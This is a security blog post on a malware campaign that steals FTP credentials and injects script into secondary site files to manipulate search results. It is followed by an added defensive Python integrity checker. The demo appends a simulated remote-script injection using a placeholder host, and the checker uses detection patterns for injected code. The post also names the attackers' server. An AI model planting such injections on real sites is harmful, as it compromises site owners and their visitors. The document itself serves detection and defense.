Malware Manipulating Google SERPs
Over the past few months, ScanSafe has been tracking malware that incorporates a couple of crafty Black Hat SEO techniques to manipulate Google SERPs. Because each infected site owner can in turn seed further compromises (described below), the attacks have been spreading rapidly and the campaign has now grown considerably large.
The attacks are perpetrated through the compromise of legitimate sites. Once a visitor to a compromised site has been infected with the trojan, any sites that visitor manages become susceptible to compromise as well, because one component of the malware monitors network traffic and steals FTP credentials. (FTP transmits credentials in cleartext, so a trojan on the webmaster's machine can capture them simply by watching outbound connections.) Though stolen FTP credentials appear to be the most common method employed in these particular attacks, compromise can also occur via the usual routes, such as poor configuration settings and vulnerable Web applications.
The malicious script embedded during the compromise is usually placed in other .js or .php files rather than directly in the site's default home page. Menu files, login pages, and similar shared includes are the typical targets. Because those files are rarely inspected directly, this technique lets the signs of the compromise escape casual observation.
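Because the injected code lands in secondary .js and .php files rather than the home page, a site owner who has reused FTP credentials from a possibly infected machine cannot rely on eyeballing index.*; the whole tree has to be compared against a known-good baseline. The following is an added example, not code from ScanSafe or from the post: it hashes every watched file under a web root, stores the result as a baseline, later diffs the live tree against it, and runs a few generic heuristics over any changed file. The web root, file contents, injected snippet and heuristic patterns are all constructed for illustration; the post does not describe the exact payload.

```python
"""Added example: baseline-and-diff integrity check for a web root.
Not from the original post; file names, contents and heuristics are constructed."""
import hashlib
import json
import os
import re
import tempfile

# Extensions the post says were targeted, plus plain HTML for completeness.
WATCHED_EXT = {".js", ".php", ".html", ".htm"}

# Generic markers often seen in injected script. Assumption: the post does not
# describe the real payload, so these are illustrative, not a signature.
SUSPICIOUS_PATTERNS = [
    ("external-script", re.compile(rb"<script[^>]*\bsrc\s*=\s*[\"']https?://", re.I)),
    ("hidden-iframe", re.compile(rb"<iframe[^>]*\b(?:width|height)\s*=\s*[\"']?0\b", re.I)),
    ("eval-unescape", re.compile(rb"eval\s*\(\s*unescape\s*\(", re.I)),
]


def sha256_of(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Hash every watched file under root, keyed by forward-slash relative path."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in WATCHED_EXT:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                baseline[rel] = sha256_of(full)
    return baseline


def save_baseline(baseline, path):
    with open(path, "w") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def find_changes(root, baseline):
    """Diff the live tree against a stored baseline: modified, added, removed paths."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def scan_for_injection(path):
    """Return the names of the heuristic patterns that match a file's bytes."""
    with open(path, "rb") as f:
        data = f.read()
    return [name for name, rx in SUSPICIOUS_PATTERNS if rx.search(data)]


def demo():
    """Constructed scenario: baseline a small site, then simulate an injection
    into a menu include (home page untouched) and report what the check finds."""
    root = tempfile.mkdtemp()
    files = {
        "index.php": b"<?php include 'header.php'; ?>\n<script src=\"/inc/menu.js\"></script>\n",
        "inc/menu.js": b"function showMenu(){document.getElementById('m').style.display='block';}\n",
        "login.php": b"<form method='post'><input name='u'><input name='p' type='password'></form>\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(content)
    baseline_path = os.path.join(root, "baseline.json")  # .json is not a watched extension
    save_baseline(build_baseline(root), baseline_path)

    # Simulated compromise: a remote script include appended to a secondary file.
    # The hostname is a constructed placeholder, not one from the post.
    with open(os.path.join(root, "inc/menu.js"), "ab") as f:
        f.write(b"\ndocument.write('<script src=\"http://example.invalid/x.js\"></script>');\n")

    changes = find_changes(root, load_baseline(baseline_path))
    hits = {p: scan_for_injection(os.path.join(root, p)) for p in changes["modified"]}
    return changes, hits


if __name__ == "__main__":
    print(demo())
```

In practice the baseline is taken from a clean deployment and stored off the web server, since an attacker holding the FTP credentials can overwrite a baseline kept alongside the site. The heuristics are only a triage aid for the files the diff flags; any modified file the owner did not change is the real finding, whether or not a pattern matches.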
The injected script leads to 94.247.2.195, which resolves to hs.2-195.zlkon.lv, hosted by Datoru Express Serviss, Latvia. Of course, the physical host location and whois information may bear little relation to where the actual attackers are.
http://blog.scansafe.com/journal/2009/4/14/malware-manipulating-google-serps.html